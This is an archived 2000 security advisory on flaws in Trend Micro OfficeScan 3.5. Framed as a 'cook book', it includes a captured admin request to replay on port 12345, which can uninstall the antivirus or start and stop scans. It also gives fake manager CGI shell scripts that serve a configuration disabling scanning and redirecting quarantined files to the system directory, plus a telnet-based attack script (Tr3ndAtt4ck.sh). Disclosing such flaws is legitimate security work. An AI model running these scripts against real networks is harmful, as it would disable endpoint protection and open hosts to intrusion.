officescan.txt

2000-03-04T00:00:00
ID PACKETSTORM:10185
Type packetstorm
Reporter Gregory Duchemin
Modified 2000-03-04T00:00:00

Description

                                        
                                            `hi,  
  
All of u have certainly seen the possibly general dos attack against  
OfficeScan just by connecting a client to the port 12345 without sending  
any TCP FIN packet at the application time-out.  
After several tests on OfficeScan 3.5, I realized there were numerous  
other security flaws resulting in possible intrusion scenarios and  
because of a lack of authentication/crypto protocol between clients and  
manager.  
OfficeScan can be potentially used as a trojan horse with some  
preliminaries steps resulting in a remote intrusion on every LAN  
workstations.  
  
IMPACT  
=======  
  
Systems concerned are Windows 95, 98, 2000 and NT  
  
The internal network malicious user can :  
  
1- remotely uninstall the anti virus  
2- remotely start the scan on the machine  
3- remotely stop the scan  
4- remotely make the anti virus inefficient by modifying the scan  
configuration file through the network on the target pc.  
5- and finally, remotely write anywhere on the target file system !.  
  
  
  
COOK BOOK to hack OfficeScan through the LAN  
=====================================  
  
  
Step 1- Replay Attack (simplest way to gain a general DOS over the LAN)  
  
The first thing to do for the LAN attacker is to sniff its own pc with  
OS installed on it then  
he has to catch an admin. packet toward any 12345 Scan Office port to  
replay the same request.  
An example of such a request :  
  
  
. . G E T / ? 0 5 6 8 0 F 5 4 5 E 8 8 A E D 5 3 9 2 B 8 8 5 E E 7 1 4  
2 D  
8 B B F 8 E 3 5 2 6 9 3 7 2 5 4 3 0 D C 1 E 7 F 9 5 4 F B 3 4 5 F E 8 9  
9 F  
0 1 2 0 3 B 2 2 2 C F A F 8 B 0 5 C A 5 D 9 0 C F 5 D E E 7 3 8 1 0 2 A  
B 1  
C A E E E 6 2 F 7 F 4 A A 3 6 E C D 2 0 C B 5 E A D E C 2 C 5 4 7 7 6 6  
5 0  
D 5 5 5 A 9 4 1 5 B E 5 3 4 8 E 7 F 0 0 F 9 8 1 A 5 D B E E 1 F 3 A B 3  
0 F  
A B C 4 3 3 2 3 0 F 6 6 B 4 9 9 8 2 F D A 5 F 0 7 7 D 0 7 A F 7 2 1 C D  
7 9  
1 8 A 5 5 8 0 C 3 3 1 B C 4 C 2 A 9 5 9 B F 6 3 4 1 1 2 B 4 F 9 A 9 3 9  
5 3  
B 8 F 6 4 B 0 2 C 8 8 1 E D 6 C 5 5 B F C D 6 2 0 5 6 1 3 4 B B F 8 0 0  
7 E  
F F B 6 6 4 3 5 1 8 1 A 7 7 6 2 E E 0 2 B 8 9 1 3 F 5 4 5 D 2 5 1 1 8 9  
7 C  
8 9 8 F 3 E 5 3 B B 8 D 4 F 4 E C 7 1 E 7 F A C 6 D 8 E 2 6 D 3 E 5 5 A  
9 A  
7 C 1 E B 9 6 B D F D 2 B E 8 4 4 F C 5 E C 6 5 D A F 6 C 7 1 C 0 2 9 4  
2 A  
9 2 B B 9 7 8 A C 8 7 5 1 2 0 2 C 5 0 E E 4 0 4 4 5 D D 6 C D 1 1 C E 1  
1 A  
9 9 0 6 H T T P / 1 . 0 . . H o s t : X1.X2.X3.X4 : 1 2 3 4 5 . .  
U s e r - A g e n t : O f f i c e S c a n / 3 . 5 . . A c c e p t :  
* /  
* . . . . . .  
  
  
The exact format of the HTTP request isn't know...it may be a kind of  
signature of the admin. password and other local network specifics  
information, may be not. More information about this point will be  
welcomed.  
At least, the last 2 bytes in it (06 in our example) is needed to code  
the type of request. Furthers tests later, some of these codes was  
definitely identified:  
  
03: used for the Alert.msg file on the remote system  
04: uninstallation request  
06: launch a virus scan on the pc  
07: Stop the scan.  
  
Because Tmlisten on the client side, doesn't check for a particular  
admin. IP or any other authentication protocol, the intruder can without  
any problem start a connection to the port 12345 and replay the request  
03,04, 06 and 07  
But if he wishes to remotely modify the behavior of the anti virus, he  
'll have to go to step 2.  
  
  
  
  
Step 2- Remote manipulation (leading to hosts intrusions and/or general  
DOS)  
  
  
  
Now a little more about Office Scan communication protocol.  
It appears that client process communicate regularly with numerous  
resident cgi on the manager side (with IIS installed on it) for, among  
other things, file transfer purpose.  
When the two clients services are launched (TmListen.exe and  
NTRScan.exe) they ask for a cgi called cgiOnStart.exe.  
  
an example of such a request (sniffit was used this time):  
------------------------------------  
  
G E T / o f f i c e s c a n / c g i / c g i O n S t a r t . e x e ? U  
I D = 4 6 3 1 8 5 3 0 - f 0 6 3 - 1 1 d 3 - 9 1 a e - 0 0 c 0 4 f 4 a 4  
c 9  
9 & D A T E = 2 0 0 0 0 3 0 3 & T I M E = 1 4 2 9 3 0 & C O M P U T E R  
= N  
OM & P L A T F O R M = W i n d o w s % 2 0 N T % 2 0 4 % 2 e 0 % 2 e 1 3  
  
8 1 & I P = Y1.Y2.Y3.Y4 & P T N F I L E = 6 6 5 & P R O G R A M = 3 .  
5 0 & E N G I N E = 5 . 1 0 0 & E N C Y = 3 5 & D O M A I N = H o f & H  
O T  
F I X = & I N S T D A T E = 2 0 0 0 0 3 0 2 & I N S T T I M E = 1 8 5 2  
1 0  
& M O B I L E = 0 & R E L E A S E = 3 . 5 0 H T T P / 1 . 0 . . A c c  
e p  
t : * / * . . U s e r - A g e n t : O f f f i c e S c a n N T C  
l i  
e n t . . H o s t : X1.X2.X3.X4 . . C o n n e c t i o n : K e e p -  
A l i  
v e  
  
  
When the intruder send a 06 type request for remote scanning, sniffer  
can catch some new requests  
toward the web port 80.  
  
figure:  
----  
  
ATTACKER  
  
|  
|  
| 1/ Request 06  
|  
|  
\/  
[12345]  
TARGET ----------------------> [80] Network Manager  
2/ anti viral scan  
<------1------ 3/ GET  
/cgi/cgiOnStart.exe  
<--- Cfg File---- 4/ GET  
/cgi/cgiRqCfg.exe  
<------------- 5/ GET  
/cgi/cgiOnScan.exe  
  
  
So when the scan start, the client ask the manager for a configuration  
file that control many aspects of the processes.  
The cgi cgiRqCfg .exe give a runtime generated configuration file for  
the scan, in a plain text format over the network, the different  
keywords present inside the file stay resident inside the Windows  
registry.  
  
By spoofing the manager and carefully design a web server with the same  
file structure and cgi name, our intruder will be able to forge  
manually configuration files and so to remotely modify the anti virus  
behavior.  
  
  
Figure:  
----  
  
  
ATTACKER (IP OF MANAGER)  
  
| [80] cgiRqCfg.exe  
| /\ |  
06 | | | ( Infectious Configuration File )  
| | |  
\/ | \/  
  
TARGET  
MANAGER (disabled by IP spoofing)  
  
  
What can i do with the configuration file ????  
  
  
ok now just take a look at the various keywords:  
------------------------------  
  
[Scan Now Configuration]"  
UID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
Scan Memory=0  
CompressedLayer=2  
ScanALLFiles=0  
ExtList=.exe, .com  
ScanRemoveable=0  
ScanFixedDisk=0  
ScanCDRom=0  
VirusFoundAction=5  
BkUpIfClean=0  
MoveDir=MANAGER\VIRUS  
CleanFailedAction=3  
CleanFailedMoveDir=MANAGER\\VIRUS  
Reserved=  
  
All this data are stored inside the  
HKEY_LOCAL_MACHINE/Software/TrendMicro/PCCilin-NTCORP/CurrentVersion/Real  
Time Scan registry key  
  
*By modifying the MoveDir and CleanFailedMoveDir bye the value  
TARGET\\anywhere, it's possible to force the remote anti virus to write  
all the infected file locally ANYWHERE on the file system, that is to  
say in the Winnt directory too.  
  
By modifying "ScanRemoveable", "ScanFixedDisk", "ScanCDRom" to zero, it  
's possible to force the anti virus to zero scan even if the services  
are still alive.  
The method is far more stealth in order to compromise a pc with a Trojan  
attached mail.  
  
Modify ExtList with a ".txt" value will force anti virus to scan only  
txt file ;)  
  
  
Source example of fakes cgi:  
  
cgiRqCfg.exe:  
---------  
  
#!/bin/sh  
  
echo "Content-type: text/plain"  
echo  
echo "[Scan Now Configuration]"  
echo "UID=N0thing th4nk you"  
echo "Scan Memory=0"  
echo "CompressedLayer=2"  
echo "ScanALLFiles=0"  
echo "ExtList= YES IT's POSS1bl3 !"  
echo "ScanRemoveable=0"  
echo "ScanFixedDisk=0"  
echo "ScanCDRom=0"  
echo "VirusFoundAction=5"  
echo "BkUpIfClean=0"  
echo "MoveDir=c:\winnt"  
echo "CleanFailedAction=3"  
echo "CleanFailedMoveDir=c:\winnt"  
echo "Reserved="  
  
  
cgiOnStart.exe  
----------  
  
#!/bin/sh  
  
echo "Pragma: no-cache"  
echo "Content-type: text/plain;charset=utf-8"  
echo  
echo "1"  
  
  
  
  
the little script for the scan request:  
  
  
Tr3ndAtt4ck.sh target_client_ip  
---------------------  
  
#!/bin/sh  
(  
sleep 2  
echo "GET  
/?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E7F954FB345FE899F  
01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEEE62F7F4AA36ECD20CB5EADEC2C54776650D555  
  
A9415BE5348E7F00F981A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A5580C  
  
331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD62056134BBF8007EFFB66435181A  
  
7762EE02B8913F545D2511897C898F3E53BB8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE84  
  
4FC5EC65DAF6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906  
HTTP/1.0"  
echo "Host: "$1":12345"  
echo "User-Agent: OfficeScan/3.5"  
echo "Accept: */*"  
echo  
echo  
sleep 5  
)| telnet $1 12345 2>&1 | tee -a ./log.txt  
  
  
SOLUTION  
=========  
  
  
In fact, there is not a lot of choice i think.  
Users should stop their service NTlisten.exe the time for trend to build  
the new version.  
However please ask Trend team for more suggestions.  
  
Please don't use this few lines for any illegal purpose and ask  
TrendMicro for any further questions.  
Regards,  
  
  
===========================  
Gregory Duchemin  
Network & Security Engineer.  
gdn@neurocom.com  
http://www.securite-internet.com  
===========================  
  
  
`